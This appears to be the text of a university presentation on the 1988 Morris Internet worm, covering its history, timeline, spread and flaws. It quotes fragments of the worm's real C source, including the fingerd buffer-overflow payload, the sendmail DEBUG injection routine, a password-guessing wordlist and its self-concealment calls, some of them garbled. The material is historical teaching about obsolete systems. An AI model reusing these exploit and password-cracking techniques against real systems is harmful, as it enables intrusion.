The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988

Creator and His Creation  November 2nd, 1988: Robert Tappan Morris, 23-year old cs student from Cornell released a worm from MIT. Aside: son of Robert Morris, Sr. Chief Scientist at the National Computer Security Center, subdivision of NSA  The Morris worm: Consisted of several files of cleverly-written C code  Intentions: Probe the size of Internet with a self-replicating program ?  Effects: -- Internet down -- Thousands of machines disconnected from Internet -- Worm on the loose

What the worm DID NOT do:  Did not cause physical damage to computer systems.  Did not alter or destroy system or user files  Did not affect machines running OSs other than VAX or BSD Unix  Did not save or transmit the cracked passwords  Did not attempt to gain superuser access  Did not plant any trojans or timebombs  Did not attack machines that were not attached to the internet

What the worm DID:  Self-propagated through Internet infecting and reinfecting machines  Self-replicated unstoppably  Explored several vulnerabilities: fingerd, sendmail, passwords  Had flaws that made it especially destructive, and/or impaired the intended functionality  Cracked user passwords  Disguised itself by several clever means

History and Origins “Worms were good at first”:  Noble usage  1975: “tapeworm” John Brunner’s The Shockwave Rider  early 1980s: John Shoch, Jon Hupp created five worms for executing helpful tasks on the internet: billboard worm, vampire worm, etc.: “ a useful way to run distributed diagnostics”  Mishap and the first lesson learned  Conclusions We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)

The Horrible Night 6:00 PM The Worm is launched 8:49 PM The Worm infects a VAX-8600 at the University of Utah 9:09 PM The Worm initiates the first attack to infect others 9:21 PM Load average on the system reaches 5 (sh be 1) 9:41 PM Load average reaches 7 10:01 PM Load average reaches 16 10:06 PM No new processes can be started. System unusable 10:20 PM System administrator kills off the worms 10:41 PM System is reinfected, load average reaches 27 10:49 PM System administrator shuts down and restarts the system 11:21 PM Reinfestation causes load average to reach 37.

fingerd Vulnerability Exploited  fingerd has a 512 char buffer  worm calls write() with 536 char + newline argument 6 words overwrite system stack including return PC, that makes a system call version of execve(“/bin/sh”) that installs the worm on the target system. char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"; /* Rewrite part of the stack frame */ l556 = 0x7fffe9fc;l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x ; l552 = 0x0001c020; #ifdef sun /* Reverse the word order for the Sun machines*/ l556 = byte_swap(l556);l560 = byte_swap(l560);l564 = byte_swap(l564); l568 = byte_swap(l568); l552 = byte_swap(l552); #endif sun write(s, buf, sizeof(buf));/* sizeof == 536 */ write(s, XS("\n"), 1); sleep(5); if (test_connection(s, s, 10)) { *fd1 = s; *fd2 = s;return 1; }

sendmail Vulnerability Exploited  TCP flaw - DEBUG flag allows to send mail to a process instead of user.  Worm sends message with DEBUG flad to a cleverly built recepient,  String sets up command deleting header, passes body to command interpreter. It will compile code that opens a connection and gets a copy of the worm #define MAIL_FROM "mail from: \n" #define MAIL_RCPT "rcpt to: \n" send_text(s, XS(MAIL_FROM)); sprintf(l548, XS(MAIL_RCPT), i, i); send_text(s, l548); send_text(s, XS("data\n")); compile_slave(host, s, saddr); send_text(s, XS("\n.\n")); send_text(s, XS("quit\n"));

Password Cracking  Exploited 2 vulnerabilities:  System: /etc/passwd file  User: weak passwords  Attack has 4 stages:  0: seek other machines to infect from /etc/hosts.equiv and /.rhosts  1: obvious password guesses (35% success)  2: worm’s internal dictionary  3: system’s online dictionary in /usr/dict/words

Worm’s dictionary char *wds[ ] = /* 0x21a74 */ {"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal",... "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0 }; /* contained 421 words*/

Concealing Itself  Rename itself to sh, which is also the name of the Bourne shell strcpy(argv[0], XS("sh"));  Set core dump size to zero: rl.rlim_cur = 0; rl.rlim_max = 0; if (setrlimit(RLIMIT_CORE, &rl)) ;  Deleting parent process and manipulating process id  Used encryption

Oops, … The Worm Had Flaws  Major flaws in the program code:  only ≈14% chance that the worm will check if the target system has already been infected  1 in 7 chance (instead of 1 in 10,000) that listening worm will not listen for a pleasequit() signal  Used TCP socket command sendto instead of the UDP send to send 1B of data from each machine to the originating Berkely machine port  There were other flaws as well

Worm Map [from

Complex Logic of the Worm

Lessons Learned  The Morris Worm was the first worm to bring Internet down  Worm is a powerful tool capable of inflicting a lot of damage  Computer crime is punishable under the Computer Fraud and Abuse Act of  Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R H Morris, quoted in the New York Times 11/5/88].  System administrators increased their efforts in protecting their systems